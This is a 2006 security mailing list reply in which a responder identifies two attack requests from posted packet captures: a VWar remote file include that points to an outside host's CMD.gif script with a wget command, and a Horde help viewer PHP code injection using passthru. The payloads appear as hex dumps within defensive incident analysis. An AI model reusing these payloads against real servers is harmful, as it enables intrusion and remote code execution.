Security Incidents mailing list archives
Re: Someone scanning for new PHP issues?
From: "Bojan Zdrnja" <bojan.zdrnja () gmail com>
Date: Sun, 16 Apr 2006 21:53:17 +1200
On 4/16/06, Jamie Riden <jamesr () europe com> wrote:
One of these might be the Horde exploit- http://isc.sans.org/diary.php?storyid=1262 - any ideas on the other? cheers, Jamie 02:38:43.817967 IP compromised.com.1044 > www.example.com.www: P 0:412(412) ack 1 win 65535 0x0000: 4500 01c4 a2ac 4000 7106 5012 0ca2 a1a1 E.....@.q.P..... 0x0010: 48e8 1e4a 0414 0050 ec05 5522 9e0c 2a9d H..J...P..U"..*. 0x0020: 5018 ffff 3431 0000 4745 5420 6874 7470 P...41..GET.http 0x0030: 3a2f 2fxx xx2e yyyy yy2e 3330 2e37 342f ://xx.yyy.30.74/ 0x0040: 7677 6172 2f69 6e63 6c75 6465 732f 6765 vwar/includes/ge 0x0050: 745f 6865 6164 6572 2e70 6870 3f76 7761 t_header.php?vwa 0x0060: 725f 726f 6f74 3d68 7474 703a 2f2f 7870 r_root=http://xp 0x0070: 6c2e 6e65 746d 6973 7068 6572 6532 2e63 l.netmisphere2.c 0x0080: 6f6d 2f43 4d44 2e67 6966 3f26 636d 643d om/CMD.gif?&cmd= 0x0090: 7767 6574 2048 5454 502f 312e 300d 0a48 wget.HTTP/1.0.
This is a VWar vulnerability in the get_header.php file (remote file include vulnerability). More info at http://www.securityfocus.com/bid/17358/info.
02:38:43.841958 IP compromised.com.1047 > www.example.com.www: P 1205950111:1205950537(426) ack 2648749032 win 65535 0x0000: 4500 01d2 a2b9 4000 7206 4ef7 0ca2 a1a1 E.....@.r.N..... 0x0010: 48e8 1e4a 0417 0050 47e1 569f 9de0 b3e8 H..J...PG.V..... 0x0020: 5018 ffff 1fd8 0000 4745 5420 6874 7470 P.......GET.http 0x0030: 3a2f 2fxx xx2e yyyy yy2e 3330 2e37 342f ://xx.yyy.30.74/ 0x0040: 7765 626d 6169 6c2f 686f 7264 652f 7365 webmail/horde/se 0x0050: 7276 6963 6573 2f68 656c 702f 3f73 686f rvices/help/?sho 0x0060: 773d 6162 6f75 7426 6d6f 6475 6c65 3d3b w=about&module=; 0x0070: 2532 322e 7061 7373 7468 7275 2825 3232 %22.passthru(%22 0x0080: 6563 686f 2532 3049 524f 434b 5448 4557 echo%20IROCKTHEW 0x0090: 4f52 4c44 2532 3229 3b27 2e20 4854 5450 ORLD%22);'..HTTP 0x00a0: 2f31 2e30 0d0a 486f 7374 3a20 3732 2e32 /1.0..Host:.72.2 0x00b0: 3332 2e33 302e 3734 0d0a 5265 6665 7265 32.30.74..
This is, as you wrote above, the Horde Help Viewer remote php code execution vulnerability. More info at http://www.securityfocus.com/bid/17292. Unfortunately exploits are in the wild, and the Horde one is especially bad (knowing that Horde is used a lot). Cheers, Bojan
Current thread:
- Someone scanning for new PHP issues? Jamie Riden (Apr 15)
- Re: Someone scanning for new PHP issues? Bojan Zdrnja (Apr 16)
- Message not available
- Re: Someone scanning for new PHP issues? Sûnnet Beskerming (Apr 16)